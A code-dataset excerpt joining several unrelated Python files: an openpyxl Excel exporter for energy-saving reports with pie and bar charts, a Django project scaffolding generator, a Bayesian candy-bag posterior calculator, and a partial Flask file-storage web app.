if "reporting_period" not in report.keys() or \
"names" not in report['reporting_period'].keys() or len(report['reporting_period']['names']) == 0:
filename = str(uuid.uuid4()) + '.xlsx'
wb.save(filename)
return filename
##################################
current_row_number = 6
reporting_period_data = report['reporting_period']
has_names_data_flag = True
if "names" not in reporting_period_data.keys() or \
reporting_period_data['names'] is None or \
len(reporting_period_data['names']) == 0:
has_names_data_flag = False
if has_names_data_flag:
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 报告期节约'
current_row_number += 1
category = reporting_period_data['names']
ca_len = len(category)
ws['B' + str(current_row_number)].fill = table_fill
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
reporting_period_data['names'][i] + " (基线-实际) (" + reporting_period_data['units'][i] + ")"
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = '吨标准煤 (基线-实际) (TCE)'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = '吨二氧化碳排放 (基线-实际) (TCO2E)'
col = chr(ord(col) + 1)
current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '节约'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_saving'][i], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgce_saving'], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgco2e_saving'], 2)
col = chr(ord(col) + 1)
current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '单位面积值'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_per_unit_area_saving'][i], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
        ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgce_per_unit_area_saving'], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
        ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgco2e_per_unit_area_saving'], 2)
col = chr(ord(col) + 1)
current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '环比'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rates_saving'][i] * 100, 2)) + '%' \
if reporting_period_data['increment_rates_saving'][i] is not None else '-'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rate_in_kgce_saving'] * 100, 2)) + '%' \
if reporting_period_data['increment_rate_in_kgce_saving'] is not None else '-'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = str(
round(reporting_period_data['increment_rate_in_kgco2e_saving'] * 100, 2)) + '%' \
if reporting_period_data['increment_rate_in_kgco2e_saving'] is not None else '-'
col = chr(ord(col) + 1)
current_row_number += 2
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 吨标准煤(TCE)占比'
current_row_number += 1
table_start_row_number = current_row_number
chart_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].font = name_small_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = '吨标准煤(TCE)占比'
current_row_number += 1
for i in range(0, ca_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = reporting_period_data['names'][i]
ws['C' + str(current_row_number)].font = name_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = round(reporting_period_data['subtotals_in_kgce_saving'][i], 2)
current_row_number += 1
table_end_row_number = current_row_number - 1
if ca_len < 4:
current_row_number = current_row_number - ca_len + 4
current_row_number += 1
pie = PieChart()
pie.title = '吨标准煤(TCE)占比'
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, 'D' + str(chart_start_row_number))
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 吨二氧化碳排放(TCO2E)占比'
current_row_number += 1
table_start_row_number = current_row_number
chart_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].fill = table_fill
ws['C' + str(current_row_number)].font = name_small_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = '吨二氧化碳排放(TCO2E)占比'
current_row_number += 1
for i in range(0, ca_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = reporting_period_data['names'][i]
ws['C' + str(current_row_number)].font = name_font
ws['C' + str(current_row_number)].alignment = c_c_alignment
ws['C' + str(current_row_number)].border = f_border
ws['C' + str(current_row_number)] = round(reporting_period_data['subtotals_in_kgco2e_saving'][i], 2)
current_row_number += 1
table_end_row_number = current_row_number - 1
if ca_len < 4:
current_row_number = current_row_number - ca_len + 4
current_row_number += 1
pie = PieChart()
pie.title = '吨二氧化碳排放(TCO2E)占比'
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, 'D' + str(chart_start_row_number))
#############################################
has_child_space_data_flag = True
if 'child_space' not in report.keys() or \
report['child_space'] is None or \
'energy_category_names' not in report['child_space'].keys() or \
report['child_space']['energy_category_names'] is None or \
len(report['child_space']['energy_category_names']) == 0:
has_child_space_data_flag = False
if has_child_space_data_flag:
child_space_data = report['child_space']
ca_len = len(child_space_data['energy_category_names'])
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 子空间数据'
current_row_number += 1
table_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['B' + str(current_row_number)].font = name_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '子空间'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
child_space_data['energy_category_names'][i] + " (" + child_space_data['units'][i] + ")"
col = chr(ord(col) + 1)
current_row_number += 1
ca_child_len = len(child_space_data['child_space_names_array'][0])
for i in range(0, ca_child_len):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = child_space_data['child_space_names_array'][0][i]
current_row_number += 1
current_row_number -= ca_child_len
for i in range(0, ca_child_len):
col = 'C'
for j in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = child_space_data['subtotals_saving_array'][j][i]
col = chr(ord(col) + 1)
current_row_number += 1
table_end_row_number = current_row_number - 1
col = 'B'
for i in range(0, ca_len):
pie = PieChart()
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
pie_data = Reference(ws, min_col=3 + i, min_row=table_start_row_number, max_row=table_end_row_number)
pie.add_data(pie_data, titles_from_data=True)
pie.set_categories(labels)
pie.title = reporting_period_data['names'][i] + " (" + \
reporting_period_data['units'][i] + ")"
pie.height = 5.25
pie.width = 9
s1 = pie.series[0]
s1.dLbls = DataLabelList()
s1.dLbls.showCatName = False
s1.dLbls.showVal = True
s1.dLbls.showPercent = True
ws.add_chart(pie, col + str(current_row_number))
col = chr(ord(col) + 2)
current_row_number += 6
################################
has_values_saving_data = True
has_timestamps_data = True
if 'values_saving' not in reporting_period_data.keys() or \
reporting_period_data['values_saving'] is None or \
len(reporting_period_data['values_saving']) == 0:
has_values_saving_data = False
if 'timestamps' not in reporting_period_data.keys() or \
reporting_period_data['timestamps'] is None or \
len(reporting_period_data['timestamps']) == 0 or \
len(reporting_period_data['timestamps'][0]) == 0:
has_timestamps_data = False
if has_values_saving_data and has_timestamps_data:
ca_len = len(reporting_period_data['names'])
time = reporting_period_data['timestamps'][0]
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 详细数据'
current_row_number += 1
chart_start_row_number = current_row_number
current_row_number += ca_len * 5
table_start_row_number = current_row_number
ws['B' + str(current_row_number)].fill = table_fill
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '日期时间'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
reporting_period_data['names'][i] + " (" + reporting_period_data['units'][i] + ")"
col = chr(ord(col) + 1)
current_row_number += 1
for i in range(0, len(time)):
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = time[i]
col = 'C'
for j in range(0, ca_len):
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['values_saving'][j][i], 2) \
if reporting_period_data['values_saving'][j][i] is not None else 0.00
col = chr(ord(col) + 1)
current_row_number += 1
table_end_row_number = current_row_number - 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '小计'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = title_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_saving'][i], 2)
col = chr(ord(col) + 1)
current_row_number += 2
format_time_width_number = 1.0
min_len_number = 1.0
min_width_number = 11.0 # format_time_width_number * min_len_number + 4 and min_width_number > 11.0
if period_type == 'hourly':
format_time_width_number = 4.0
min_len_number = 2
min_width_number = 12.0
elif period_type == 'daily':
format_time_width_number = 2.5
min_len_number = 4
min_width_number = 14.0
elif period_type == 'monthly':
format_time_width_number = 2.1
min_len_number = 4
min_width_number = 12.4
elif period_type == 'yearly':
format_time_width_number = 1.5
min_len_number = 5
min_width_number = 11.5
for i in range(0, ca_len):
bar = BarChart()
bar.title = \
reporting_period_data['names'][i] + " (" + reporting_period_data['units'][i] + ")"
labels = Reference(ws, min_col=2, min_row=table_start_row_number + 1, max_row=table_end_row_number)
bar_data = Reference(ws, min_col=3 + i, min_row=table_start_row_number, max_row=table_end_row_number)
bar.add_data(bar_data, titles_from_data=True)
bar.set_categories(labels)
bar.height = 5.25
bar.width = format_time_width_number * len(time) if len(time) > min_len_number else min_width_number
bar.dLbls = DataLabelList()
bar.dLbls.showVal = True
bar.dLbls.showPercent = True
chart_col = 'B'
chart_cell = chart_col + str(chart_start_row_number)
chart_start_row_number += 5
ws.add_chart(bar, chart_cell)
filename = str(uuid.uuid4()) + '.xlsx'
wb.save(filename)
return filename
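# Note on the pattern repeated throughout this exporter: each pie/bar block writes a
# small header+data table starting in column B, points openpyxl Reference ranges at
# those cells, attaches a DataLabelList so values/percentages render on the chart,
# and then anchors the chart a few columns over with ws.add_chart(chart, cell).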
``` |
{
"source": "824750130/django-cli",
"score": 2
} |
#### File: builder/core/file_content.py
```python
git_ignore_content = '''__pycache__/
*.py[cod]
*$py.class
.idea/
.vscode/
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
env/
venv/
'''
init_db_content = '''import pymysql
pymysql.install_as_MySQLdb()
'''
models_content = '''from django.db import models
# class User(models.Model):
# username = models.CharField(max_length=32, unique=True)
'''
admin_content = '''from django.contrib import admin
# from {0} import models
# admin.site.register(models.User)
'''
apps_content = """from django.apps import AppConfig
class App1Config(AppConfig):
name = '{0}'
"""
manage_content = """import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
"""
setting_content = """import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '%s'
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',%s
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = '%s.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = '%s.wsgi.application'
DATABASES = %s
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
"""
wsgi_content = """import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
application = get_wsgi_application()
"""
asgi_content = """import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', '{0}.settings')
application = get_asgi_application()
"""
gunicorn_content = '''import multiprocessing
bind = '0.0.0.0:8080'
timeout = 30
worker_class = '{0}'
workers = multiprocessing.cpu_count() * 2 + 1
threads = 2
'''
uwsgi_content = '''[uwsgi]
http=0.0.0.0:8000
master = true
harakiri = 30
processes = 9
'''
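# A minimal usage sketch (illustrative only, not part of the original module; the
# literal values below are assumptions): setting_content expects five values, in
# the same order that create_root_dir_file() in project.py supplies them:
#
#   example_settings = setting_content % (
#       'dummy-secret-key',                 # SECRET_KEY
#       "\r\n\t'app1',",                    # extra INSTALLED_APPS entries
#       'myproject',                        # ROOT_URLCONF prefix
#       'myproject',                        # WSGI_APPLICATION prefix
#       "{'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': 'db.sqlite3'}}",
#   )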
```
#### File: builder/core/git.py
```python
from .common import wopen
from ..config import CHOICE_RES
from .file_content import git_ignore_content
def create_git_ignore(pro_name):
print(f'Creating file: {pro_name}/.gitignore')
with wopen(f'project/{pro_name}/.gitignore') as f:
f.write(git_ignore_content)
def create():
pro_name = CHOICE_RES['project_name']
create_git_ignore(pro_name)
```
#### File: builder/core/project.py
```python
import os
import random
from ..config import CHOICE_RES
from .common import wopen
from .file_content import *
def get_random_string(length):
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
return ''.join(random.choice(chars) for i in range(length))
def create_application(pro_name, app_conf):
app_name = app_conf['name']
views = app_conf['views']
app_path = 'project/' + pro_name + '/' + app_name
os.makedirs(app_path)
os.makedirs(app_path + '/migrations')
print(f'Creating file: {app_path}/migrations/__init__.py')
wopen(f'{app_path}/migrations/__init__.py').close()
if views:
os.makedirs(app_path + '/views')
else:
print(f'Creating file: {app_path}/views.py')
wopen(f'{app_path}/views.py').close()
print(f'Creating file: {app_path}/__init__.py')
if CHOICE_RES['database'].get('engine') == 'mysql':
with wopen(f'{app_path}/__init__.py') as f:
f.write(init_db_content)
else:
wopen(f'{app_path}/__init__.py').close()
with wopen(f'{app_path}/admin.py') as f:
f.write(admin_content.format(app_name))
print(f'Creating file: {app_path}/apps.py')
with wopen(f'{app_path}/apps.py') as f:
f.write(apps_content.format(app_name))
print(f'Creating file: {app_path}/models.py')
with wopen(f'{app_path}/models.py') as f:
f.write(models_content)
print(f'Creating file: {app_path}/test.py')
with wopen(f'{app_path}/test.py') as f:
f.write('from django.test import TestCase')
django_vision = CHOICE_RES['django_vision']
if django_vision.startswith('1'):
urls_content = '''from django.conf.urls import url
urlpatterns = [
]
'''
else:
urls_content = '''from django.urls import path, include
urlpatterns = [
]
'''
print(f'Creating file: {app_path}/urls.py')
with wopen(f'{app_path}/urls.py') as f:
f.write(urls_content)
return app_name
def create_project(pro_name):
pro_path = 'project/' + pro_name + '/' + pro_name
templates_path = 'project/' + pro_name + '/templates'
os.makedirs(pro_path)
os.makedirs(templates_path)
def create_manage_file(pro_name):
print('Creating file: manage.py')
with wopen(f'project/{pro_name}/manage.py') as f:
f.write(manage_content.format(pro_name))
wopen(f'project/{pro_name}/test.py').close()
def create_root_dir_file(pro_name):
secret_key = get_random_string(50)
pro_path = 'project/' + pro_name
database_conf = CHOICE_RES['database']
application_conf = CHOICE_RES['application']
if application_conf is None:
application = ''
else:
application = ''
for app in application_conf:
            # create the app and get back its app_name
app_name = create_application(pro_name, app)
application += "\r\n\t'" + app_name + "',"
if not database_conf:
database = '''{
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
'''
else:
engine = database_conf['engine']
host = database_conf.get('host', '127.0.0.1')
port = database_conf.get('port', '3306')
db = database_conf.get('db')
user = database_conf.get('user', 'root')
password = database_conf.get('password', '')
database = '''{
'default': {
'ENGINE': 'django.db.backends.%s',
'NAME': '%s',
'HOST': '%s',
'PORT': '%s',
'USER': '%s',
        'PASSWORD': '%s',
}
}
''' % (engine, db, host, port, user, password)
wopen(f'{pro_path}/{pro_name}/__init__.py').close()
    print(f'Creating file: {pro_name}/settings.py')
    with wopen(f'{pro_path}/{pro_name}/settings.py') as f:
f.write(setting_content % (secret_key, application, pro_name, pro_name, database))
django_vision = CHOICE_RES['django_vision']
if django_vision.startswith('1'):
from_url = 'from django.conf.urls import url, include'
else:
from_url = 'from django.urls import path, include'
url_app = ''
if application_conf:
for i, app in enumerate(application_conf):
app_name = app['name']
if django_vision.startswith('1'):
if i == 0:
url_app += f"\turl(r'^admin/', admin.site.urls),\r\n"
url_app += f"\turl('', include('{app_name}.urls')),\r\n"
else:
if i == 0:
url_app += f"\tpath('admin/', admin.site.urls),\r\n"
url_app += f"\tpath('', include('{app_name}.urls')),\r\n"
else:
if django_vision.startswith('1'):
url_app = f"\turl(r'^admin/', admin.site.urls),\r\n"
else:
url_app = f"\tpath('admin/', admin.site.urls),\r\n"
urls_content = """from django.contrib import admin
{0}
urlpatterns = [
{1}
]
""".format(from_url, url_app)
print(f'Creating file: {pro_name}/urls.py')
with wopen(f'{pro_path}/{pro_name}/urls.py') as f:
f.write(urls_content)
print(f'Creating file: {pro_name}/wsgi.py')
with wopen(f'{pro_path}/{pro_name}/wsgi.py') as f:
f.write(wsgi_content.format(pro_name))
if django_vision.startswith('3'):
print(f'Creating file: {pro_name}/asgi.py')
with wopen(f'{pro_path}/{pro_name}/asgi.py') as f:
f.write(asgi_content.format(pro_name))
def create():
pro_name = CHOICE_RES['project_name']
create_project(pro_name)
create_manage_file(pro_name)
create_root_dir_file(pro_name)
```
#### File: 824750130/django-cli/cli.py
```python
import subprocess
from builder.config import CHOICE_RES, Config
from builder import script
from builder.core import require, project, wsgi, git, venv
def start():
    # install the key-control package (pynput)
script.pip_install('pynput', output=False)
listen = script.cc.listen
# 项目名称
project_name = CHOICE_RES['project_name']
while not project_name:
project_name = input("项目名称:")
CHOICE_RES['project_name'] = project_name
    # choose whether to build the project from an imported config file
conf = None
while conf is None:
conf = input("是否读取配置文件构建项目(y/N):")
if conf.upper() == 'Y':
CHOICE_RES['django_vision'] = Config['django_vision']
CHOICE_RES['wsgi_engine'] = Config['wsgi']['engine']
CHOICE_RES['wsgi_mode'] = Config['wsgi']['mode']
CHOICE_RES['application'] = Config['application']
CHOICE_RES['database'] = Config['database']
CHOICE_RES['docker'] = Config['docker']
require.requirement['Django'] = Config['django_vision']
if Config['wsgi']['engine']:
require.requirement[Config['wsgi']['engine']] = True
if Config['database'].get('engine') == 'mysql':
require.requirement['PyMySQL'] = True
else:
        # choose the Django version
django_vision = CHOICE_RES['django_vision']
while not django_vision:
django_vision = input("选择要构建的django版本 (1.1.11):")
CHOICE_RES['django_vision'] = django_vision
require.requirement['Django'] = django_vision
        # choose the WSGI server
listen('wsgi_engine')
wsgi_engine = CHOICE_RES['wsgi_engine']
if wsgi_engine is not None:
require.requirement[wsgi_engine] = True
listen('wsgi_mode')
    # start creating the project
project.create()
require.create()
wsgi.create()
git.create()
    # build the local virtual environment
dev = 'z'
while dev.upper() != 'Y' and dev.upper() != 'N' and dev:
dev = input("是否在本地构建开发环境(Y/n):")
if dev.upper() == 'Y' or not dev:
dev_name = input(f"虚拟环境的名称(venv):")
if not dev_name:
dev_name = 'venv'
venv.create_env(dev_name)
def run():
start()
if __name__ == '__main__':
run()
``` |
{
"source": "824zzy/CSE-5360_AI",
"score": 3
} |
#### File: optional_assignment_2/task1/compute_a_posteriori.py
```python
from sys import argv
class env:
def __init__(self):
self.h1 = [0.1, 1, 0]
self.h2 = [0.2, 0.75, 0.25]
self.h3 = [0.4, 0.5, 0.5]
self.h4 = [0.2, 0.25, 0.75]
self.h5 = [0.1, 0, 1]
self.bags = [self.h1, self.h2, self.h3, self.h4, self.h5]
self.obs = 0.5
def posterior(self, cand):
for b in self.bags:
if cand=='C':
b[0] = b[1]*b[0]/self.obs
else:
b[0] = b[2]*b[0]/self.obs
def observation(self, cand):
self.obs = 0
for b in self.bags:
if cand=="C":
self.obs += b[0] * b[1]
else:
self.obs += b[0] * b[2]
return self.obs
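# The two methods above implement the standard Bayesian update used in this task:
#   posterior:   P(h_i | q) = P(q | h_i) * P(h_i) / P(q)
#   observation: P(q)       = sum_i P(h_i) * P(q | h_i)
# where each bag entry is b = [P(h_i), P(q='C' | h_i), P(q!='C' | h_i)].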
if __name__ == "__main__":
Q = argv[1]
E = env()
f = open('result.txt', 'w')
f.write("Observation sequence Q: {}\n".format(Q))
f.write("Length of Q: {}\n".format(len(Q)))
    Q += 'C'  # append a dummy observation so the last real observation still yields a "next candy" prediction in the loop below
E.observation(Q[0])
for i in range(len(Q)-1):
f.write("\nAfter Observation {}: {}\n\n".format(i+1, Q[i]))
E.posterior(Q[i])
curr = E.observation(Q[i+1])
for j in range(len(E.bags)):
f.write("P(h{} | Q) = {}\n".format(j+1, E.bags[j][0]))
if Q[i+1]=='C':
f.write("\nProbability that the next candy we pick will be C, given Q: {}".format(curr))
f.write("\nProbability that the next candy we pick will be L, given Q: {}\n".format(1-curr))
else:
f.write("\nProbability that the next candy we pick will be C, given Q: {}".format(1-curr))
f.write("\nProbability that the next candy we pick will be L, given Q: {}\n".format(curr))
``` |
{
"source": "824zzy/CSE6331_CloudComputing",
"score": 3
} |
#### File: CSE6331_CloudComputing/hw1/main.py
```python
from flask import Flask, render_template, request, url_for, abort, redirect
from flask_cloudy import Storage
import os
import pandas as pd
port = int(os.getenv('PORT', 8000))
curr_file = None
app = Flask(__name__)
app.config.update({
"STORAGE_PROVIDER": "LOCAL", # Can also be S3, GOOGLE_STORAGE, etc...
"STORAGE_KEY": "",
"STORAGE_SECRET": "",
"STORAGE_CONTAINER": "./files", # a directory path for local, bucket name of cloud
"STORAGE_SERVER": True,
"STORAGE_SERVER_URL": "/files" # The url endpoint to access files on LOCAL provider
})
# Setup storage
storage = Storage()
storage.init_app(app)
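# Hedged sketch (illustrative assumption, not part of the original app): the same
# Storage object can target a cloud bucket by swapping the config above, e.g.
# app.config.update({
#     "STORAGE_PROVIDER": "S3",
#     "STORAGE_KEY": "<aws-access-key-id>",
#     "STORAGE_SECRET": "<aws-secret-access-key>",
#     "STORAGE_CONTAINER": "my-bucket-name",
# })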
@app.route("/")
def index():
csv_obj, other_obj = [], []
for obj in storage:
fname = obj.name
if fname.split('.')[-1]=='csv':
csv_obj.append(obj)
else:
other_obj.append(obj)
return render_template("index.html", csv_obj=csv_obj, other_obj=other_obj)
@app.route("/view/<path:object_name>")
def view(object_name):
obj = storage.get(object_name)
f_type = obj.name.split('.')[-1]
if f_type=='csv':
df = pd.read_csv('.'+obj.url, engine='python')
global curr_file
curr_file = '.'+obj.url
img_list = df['Picture'].values.tolist()
names = df['Name'].values.tolist()
img_urls = ['./files/'+u for u in img_list if isinstance(u, str)]
info = df.values.tolist()
elif f_type=='jpg':
info, img_urls, names = None, None, None
else:
info, img_urls, names = None, None, None
return render_template("view.html", obj=obj, info=info, img_urls=img_urls, names=names)
@app.route("/add_people", methods=["POST"])
def add_people_info():
name = request.form['ppl_name']
salary = request.form['ppl_salary']
room = request.form['ppl_room']
telnum = request.form['ppl_telnum']
keywords = request.form['ppl_keywords']
df = pd.read_csv(curr_file, engine='python')
df = df.append({'Name': name,
'Salary':salary,
'Room': room,
'Telnum': telnum,
'Keywords': keywords}, ignore_index=True)
df.to_csv(curr_file, index=False)
my_object = curr_file.split('/')[-1]
return redirect(url_for("view", object_name=my_object))
@app.route("/remove_people", methods=["POST"])
def remove_people():
name = request.form['rm_name']
df = pd.read_csv(curr_file, engine='python')
df = df[df.Name != name]
df.to_csv(curr_file, index=False)
my_object = curr_file.split('/')[-1]
return redirect(url_for("view", object_name=my_object))
@app.route("/upload", methods=["POST"])
def upload():
usr_file = request.files.get("file")
storage.upload(usr_file)
return redirect("/")
@app.route("/people", methods=['POST'])
def search_people():
target_name = request.form['pplname']
target_url = './files/'+target_name+'.jpg'
if not os.path.exists(target_url):
target_url = None
return render_template("people.html", img_url=target_url)
@app.route("/people_by_salary", methods=['POST'])
def search_people_by_salary():
min_salary = request.form['min_salary']
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if line[1]<int(min_salary):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4]])
return render_template("people_by_salary.html", people=resp)
@app.route("/change_info", methods=['POST'])
def change_people_info():
ppl = request.form['change_people']
